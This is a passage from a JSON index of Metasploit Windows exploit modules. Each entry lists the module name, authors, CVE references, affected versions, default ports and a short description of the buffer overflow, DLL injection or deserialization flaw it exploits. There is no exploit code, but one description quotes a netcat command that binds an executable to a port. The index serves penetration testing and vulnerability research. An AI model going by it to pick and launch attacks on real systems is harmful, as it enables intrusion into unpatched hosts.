"notes": {
"SideEffects": [
"screen-effects"
],
"Stability": [
"crash-safe"
]
}
},
"exploit_windows/misc/ib_isc_attach_database": {
"name": "Borland InterBase isc_attach_database() Buffer Overflow",
"full_name": "exploit/windows/misc/ib_isc_attach_database",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38607",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Borland InterBase WI-V8.1.0.257",
"Borland InterBase WI-V8.0.0.123",
"Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80",
"Borland InterBase WI-V7.0.1.1",
"Borland InterBase WI-V6.5.0.28",
"Borland InterBase WI-V6.0.1.6",
"Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0",
"Borland InterBase WI-V5.5.0.742",
"Borland InterBase WI-V5.1.1.680",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ib_isc_attach_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/ib_isc_attach_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ib_isc_create_database": {
"name": "Borland InterBase isc_create_database() Buffer Overflow",
"full_name": "exploit/windows/misc/ib_isc_create_database",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38606",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Borland InterBase WI-V8.1.0.257",
"Borland InterBase WI-V8.0.0.123",
"Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80",
"Borland InterBase WI-V7.0.1.1",
"Borland InterBase WI-V6.5.0.28",
"Borland InterBase WI-V6.0.1.6",
"Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0",
"Borland InterBase WI-V5.5.0.742",
"Borland InterBase WI-V5.1.1.680",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ib_isc_create_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/ib_isc_create_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ib_svc_attach": {
"name": "Borland InterBase SVC_attach() Buffer Overflow",
"full_name": "exploit/windows/misc/ib_svc_attach",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38605",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Borland InterBase WI-V8.1.0.257",
"Borland InterBase WI-V8.0.0.123",
"Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80",
"Borland InterBase WI-V7.0.1.1",
"Borland InterBase WI-V6.5.0.28",
"Borland InterBase WI-V6.0.1.6",
"Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0",
"Borland InterBase WI-V5.5.0.742",
"Borland InterBase WI-V5.1.1.680",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ib_svc_attach.rb",
"is_install_path": true,
"ref_name": "windows/misc/ib_svc_attach",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_cognos_tm1admsd_bof": {
"name": "IBM Cognos tm1admsd.exe Overflow",
"full_name": "exploit/windows/misc/ibm_cognos_tm1admsd_bof",
"rank": 300,
"disclosure_date": "2012-04-02",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in IBM Cognos Analytic Server\n Admin service. The vulnerability exists in the tm1admsd.exe component, due to a\n dangerous copy of user controlled data to the stack, via memcpy, without validating\n the supplied length and data. The module has been tested successfully on IBM Cognos\n Express 9.5 over Windows XP SP3.",
"references": [
"CVE-2012-0202",
"OSVDB-80876",
"BID-52847",
"ZDI-12-101",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314"
],
"platform": "Windows",
"arch": "",
"rport": 5498,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Cognos Express 9.5 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_cognos_tm1admsd_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_director_cim_dllinject": {
"name": "IBM System Director Agent DLL Injection",
"full_name": "exploit/windows/misc/ibm_director_cim_dllinject",
"rank": 600,
"disclosure_date": "2009-03-10",
"type": "exploit",
"author": [
"Bernhard Mueller",
"kingcope",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"wmicimsv\" service on IBM System Director Agent 5.20.3\n to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM\n privileges.\n\n In order to accomplish remote DLL injection it uses a WebDAV service as disclosed\n by kingcope on December 2012. Because of this, the target host must have the\n WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically\n started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.",
"references": [
"CVE-2009-0880",
"OSVDB-52616",
"OSVDB-88102",
"BID-34065",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt",
"URL-https://seclists.org/bugtraq/2012/Dec/5"
],
"platform": "Windows",
"arch": "",
"rport": 6988,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IBM System Director Agent 5.20.3 / Windows with WebClient enabled"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_director_cim_dllinject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_tsm_cad_ping": {
"name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",
"full_name": "exploit/windows/misc/ibm_tsm_cad_ping",
"rank": 400,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n By sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n for the vulnerable code to be reached. This state doesn't appear to be reachable when the\n TSM server is not running. This service does not restart.",
"references": [
"CVE-2009-3853",
"OSVDB-59632"
],
"platform": "Windows",
"arch": "",
"rport": 1582,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Tivoli Storage Manager Express 5.3.6.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_tsm_cad_ping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_tsm_rca_dicugetidentify": {
"name": "IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",
"full_name": "exploit/windows/misc/ibm_tsm_rca_dicugetidentify",
"rank": 500,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n Client Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n NodeName parameter, an attacker can execute arbitrary code.\n\n NOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n the port number on which it runs. This service does not restart.",
"references": [
"CVE-2008-4828",
"OSVDB-54232",
"BID-34803"
],
"platform": "Windows",
"arch": "",
"rport": 1582,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Tivoli Storage Manager Express 5.3.6.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_tsm_rca_dicugetidentify",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ibm_websphere_java_deserialize": {
"name": "IBM WebSphere RCE Java Deserialization Vulnerability",
"full_name": "exploit/windows/misc/ibm_websphere_java_deserialize",
"rank": 600,
"disclosure_date": "2015-11-06",
"type": "exploit",
"author": [
"Liatsis Fotios <Liatsis Fotios @liatsisfotios>"
],
"description": "This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization\n call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows\n remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.",
"references": [
"CVE-2015-7450",
"URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java",
"URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability",
"URL-https://www.tenable.com/plugins/index.php?view=single&id=87171"
],
"platform": "Windows",
"arch": "",
"rport": "8880",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IBM WebSphere 7.0.0.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb",
"is_install_path": true,
"ref_name": "windows/misc/ibm_websphere_java_deserialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/itunes_extm3u_bof": {
"name": "Apple iTunes 10 Extended M3U Stack Buffer Overflow",
"full_name": "exploit/windows/misc/itunes_extm3u_bof",
"rank": 300,
"disclosure_date": "2012-06-21",
"type": "exploit",
"author": [
"Rh0 <rh0@z1p.biz>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.\n When opening an extended .m3u file containing an \"#EXTINF:\" tag description,\n iTunes will copy the content after \"#EXTINF:\" without appropriate checking\n from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,\n which allows code execution under the context of the user.\n\n Please note before using this exploit, you must have precise knowledge of the\n victim machine's QuickTime version (if installed), and then select your target\n accordingly.\n\n In addition, even though this exploit can be used as remote, you should be aware\n the victim's browser behavior when opening an itms link. For example,\n IE/Firefox/Opera by default will ask the user for permission before launching the\n itms link by iTunes. Chrome will ask for permission, but also spits a warning.\n Safari would be an ideal target, because it will open the link without any\n user interaction.",
"references": [
"OSVDB-83220",
"EDB-19322",
"URL-http://pastehtml.com/view/c25uhk4ab.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3",
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3",
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3",
"iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/itunes_extm3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/itunes_extm3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/landesk_aolnsrvr": {
"name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow",
"full_name": "exploit/windows/misc/landesk_aolnsrvr",
"rank": 200,
"disclosure_date": "2007-04-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.",
"references": [
"CVE-2007-1674",
"OSVDB-34964",
"URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html"
],
"platform": "Windows",
"arch": "",
"rport": 65535,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Alerting Proxy 2000/2003/XP",
"Alerting Proxy 2003 SP1-2 (NX support)",
"Alerting Proxy XP SP2 (NX support)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/landesk_aolnsrvr.rb",
"is_install_path": true,
"ref_name": "windows/misc/landesk_aolnsrvr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/lianja_db_net": {
"name": "Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow",
"full_name": "exploit/windows/misc/lianja_db_net",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module exploits a stack buffer overflow in the db_netserver process, which\n is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.",
"references": [
"CVE-2013-3563",
"OSVDB-93759"
],
"platform": "Windows",
"arch": "x86",
"rport": 8001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2",
"Lianja SQL 1.0.0RC5.1 / Windows XP SP3"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/misc/lianja_db_net.rb",
"is_install_path": true,
"ref_name": "windows/misc/lianja_db_net",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
]
}
},
"exploit_windows/misc/manageengine_eventlog_analyzer_rce": {
"name": "ManageEngine EventLog Analyzer Remote Code Execution",
"full_name": "exploit/windows/misc/manageengine_eventlog_analyzer_rce",
"rank": 0,
"disclosure_date": "2015-07-11",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.",
"references": [
"EDB-38173",
"CVE-2015-7387",
"URL-https://seclists.org/fulldisclosure/2015/Sep/59"
],
"platform": "Windows",
"arch": "x86",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/manageengine_eventlog_analyzer_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/misc/mercury_phonebook": {
"name": "Mercury/32 PH Server Module Buffer Overflow",
"full_name": "exploit/windows/misc/mercury_phonebook",
"rank": 200,
"disclosure_date": "2005-12-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in\n Mercury/32 <= v4.01b PH Server Module. This issue is\n due to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.",
"references": [
"CVE-2005-4411",
"OSVDB-22103",
"BID-16396"
],
"platform": "Windows",
"arch": "",
"rport": 105,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP0/SP1 English",
"Windows 2000 Pro English ALL"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/mercury_phonebook.rb",
"is_install_path": true,
"ref_name": "windows/misc/mercury_phonebook",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/mini_stream": {
"name": "Mini-Stream 3.0.1.1 Buffer Overflow",
"full_name": "exploit/windows/misc/mini_stream",
"rank": 300,
"disclosure_date": "2009-12-25",
"type": "exploit",
"author": [
"Unknown",
"Ron Henry <rlh@ciphermonk.net>"
],
"description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1.\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2009-5109",
"OSVDB-61341",
"EDB-10745"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 ENG",
"Windows XP SP2 ENG"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/mini_stream.rb",
"is_install_path": true,
"ref_name": "windows/misc/mini_stream",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/mirc_privmsg_server": {
"name": "mIRC PRIVMSG Handling Stack Buffer Overflow",
"full_name": "exploit/windows/misc/mirc_privmsg_server",
"rank": 300,
"disclosure_date": "2008-10-02",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n may be necessary. This module is based on the code by SkD.",
"references": [
"CVE-2008-4449",
"OSVDB-48752",
"BID-31552",
"EDB-6666"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/mirc_privmsg_server.rb",
"is_install_path": true,
"ref_name": "windows/misc/mirc_privmsg_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ms07_064_sami": {
"name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow",
"full_name": "exploit/windows/misc/ms07_064_sami",
"rank": 300,
"disclosure_date": "2007-12-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the DirectShow Synchronized\n Accessible Media Interchanged (SAMI) parser in quartz.dll. This module\n has only been tested with Windows Media Player (6.4.09.1129) and\n DirectX 8.0.",
"references": [
"CVE-2007-3901",
"OSVDB-39126",
"MSB-MS07-064",
"BID-26789"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ms07_064_sami.rb",
"is_install_path": true,
"ref_name": "windows/misc/ms07_064_sami",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ms10_104_sharepoint": {
"name": "MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution",
"full_name": "exploit/windows/misc/ms10_104_sharepoint",
"rank": 600,
"disclosure_date": "2010-12-14",
"type": "exploit",
"author": [
"Oleksandr Mirosh",
"James Burton",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in SharePoint Server 2007 SP2. The\n software contains a directory traversal vulnerability that allows a remote attacker to write\n arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile\n request to the Office Document Conversions Launcher Service, which results in code\n execution under the context of 'SYSTEM'.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.\n It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows\n 2003 SP2.",
"references": [
"CVE-2010-3964",
"OSVDB-69817",
"BID-45264",
"MSB-MS10-104",
"ZDI-10-287"
],
"platform": "Windows",
"arch": "",
"rport": 8082,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ms10_104_sharepoint.rb",
"is_install_path": true,
"ref_name": "windows/misc/ms10_104_sharepoint",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/netcat110_nt": {
"name": "Netcat v1.10 NT Stack Buffer Overflow",
"full_name": "exploit/windows/misc/netcat110_nt",
"rank": 500,
"disclosure_date": "2004-12-27",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n an overly long string we are able to overwrite SEH. The vulnerability\n exists when netcat is used to bind (-e) an executable to a port in doexec.c.\n This module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".",
"references": [
"CVE-2004-1317",
"OSVDB-12612",
"BID-12106",
"EDB-726"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal nc.exe"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/netcat110_nt.rb",
"is_install_path": true,
"ref_name": "windows/misc/netcat110_nt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/nettransport": {
"name": "NetTransport Download Manager 2.90.510 Buffer Overflow",
"full_name": "exploit/windows/misc/nettransport",
"rank": 300,
"disclosure_date": "2010-01-02",
"type": "exploit",
"author": [
"Lincoln",
"dookie"
],
"description": "This exploits a stack buffer overflow in NetTransport Download Manager,\n part of the NetXfer suite. This module was tested\n successfully against version 2.90.510.",
"references": [
"CVE-2017-17968",
"OSVDB-61435",
"EDB-10911"
],
"platform": "Windows",
"arch": "",
"rport": 22222,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/nettransport.rb",
"is_install_path": true,
"ref_name": "windows/misc/nettransport",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/nvidia_mental_ray": {
"name": "Nvidia Mental Ray Satellite Service Arbitrary DLL Injection",
"full_name": "exploit/windows/misc/nvidia_mental_ray",
"rank": 600,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Donato Ferrante",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.\n When it receives the command to load a DLL (via a UNC path) it will try to\n connect back to the host on port 7514. If a TCP connection is successful it will\n then attempt to load the DLL. This module has been tested successfully on Win7 x64\n with Nvidia Mental Ray Satellite Service v3.11.1.",
"references": [
"URL-http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf",
"OSVDB-100827"
],
"platform": "Windows",
"arch": "",
"rport": 7414,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/nvidia_mental_ray.rb",
"is_install_path": true,
"ref_name": "windows/misc/nvidia_mental_ray",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/plugx": {
"name": "PlugX Controller Stack Overflow",
"full_name": "exploit/windows/misc/plugx",
"rank": 300,
"disclosure_date": "2017-07-27",
"type": "exploit",
"author": [
"Professor Plum"
],
"description": "This module exploits a stack buffer overflow in the PlugX Controller (C2 server).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 13579,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PlugX Type I (old)",
"PlugX Type I",
"PlugX Type II"
],
"mod_time": "2017-09-04 20:57:23 +0000",
"path": "/modules/exploits/windows/misc/plugx.rb",
"is_install_path": true,
"ref_name": "windows/misc/plugx",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poisonivy_21x_bof": {
"name": "Poison Ivy 2.1.x C2 Buffer Overflow",
"full_name": "exploit/windows/misc/poisonivy_21x_bof",
"rank": 300,
"disclosure_date": "2016-06-03",
"type": "exploit",
"author": [
"Jos Wetzels"
],
"description": "This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.",
"references": [
"URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware"
],
"platform": "Windows",
"arch": "",
"rport": 3460,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Poison Ivy 2.1.4 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poisonivy_21x_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/poisonivy_21x_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poisonivy_bof": {
"name": "Poison Ivy Server Buffer Overflow",
"full_name": "exploit/windows/misc/poisonivy_bof",
"rank": 300,
"disclosure_date": "2012-06-24",
"type": "exploit",
"author": [
"Andrzej Dereszowski",
"Gal Badishi",
"juan vazquez <juan.vazquez@metasploit.com>",
"Jos Wetzels"
],
"description": "This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.",
"references": [
"OSVDB-83774",
"EDB-19613",
"URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf",
"URL-http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/"
],
"platform": "Windows",
"arch": "",
"rport": 3460,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1",
"Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1",
"Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poisonivy_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/poisonivy_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poppeeper_date": {
"name": "POP Peeper v3.4 DATE Buffer Overflow",
"full_name": "exploit/windows/misc/poppeeper_date",
"rank": 300,
"disclosure_date": "2009-02-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted DATE string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.",
"references": [
"CVE-2009-1029",
"OSVDB-53560",
"BID-34093"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"POP Peeper v3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poppeeper_date.rb",
"is_install_path": true,
"ref_name": "windows/misc/poppeeper_date",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/poppeeper_uidl": {
"name": "POP Peeper v3.4 UIDL Buffer Overflow",
"full_name": "exploit/windows/misc/poppeeper_uidl",
"rank": 300,
"disclosure_date": "2009-02-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted UIDL string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.",
"references": [
"OSVDB-53559",
"CVE-2009-1029",
"BID-33926"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"POP Peeper v3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/poppeeper_uidl.rb",
"is_install_path": true,
"ref_name": "windows/misc/poppeeper_uidl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/realtek_playlist": {
"name": "Realtek Media Player Playlist Buffer Overflow",
"full_name": "exploit/windows/misc/realtek_playlist",
"rank": 500,
"disclosure_date": "2008-12-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n When a Realtek Media Player client opens a specially crafted playlist, an\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-5664",
"OSVDB-50715",
"BID-32860"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
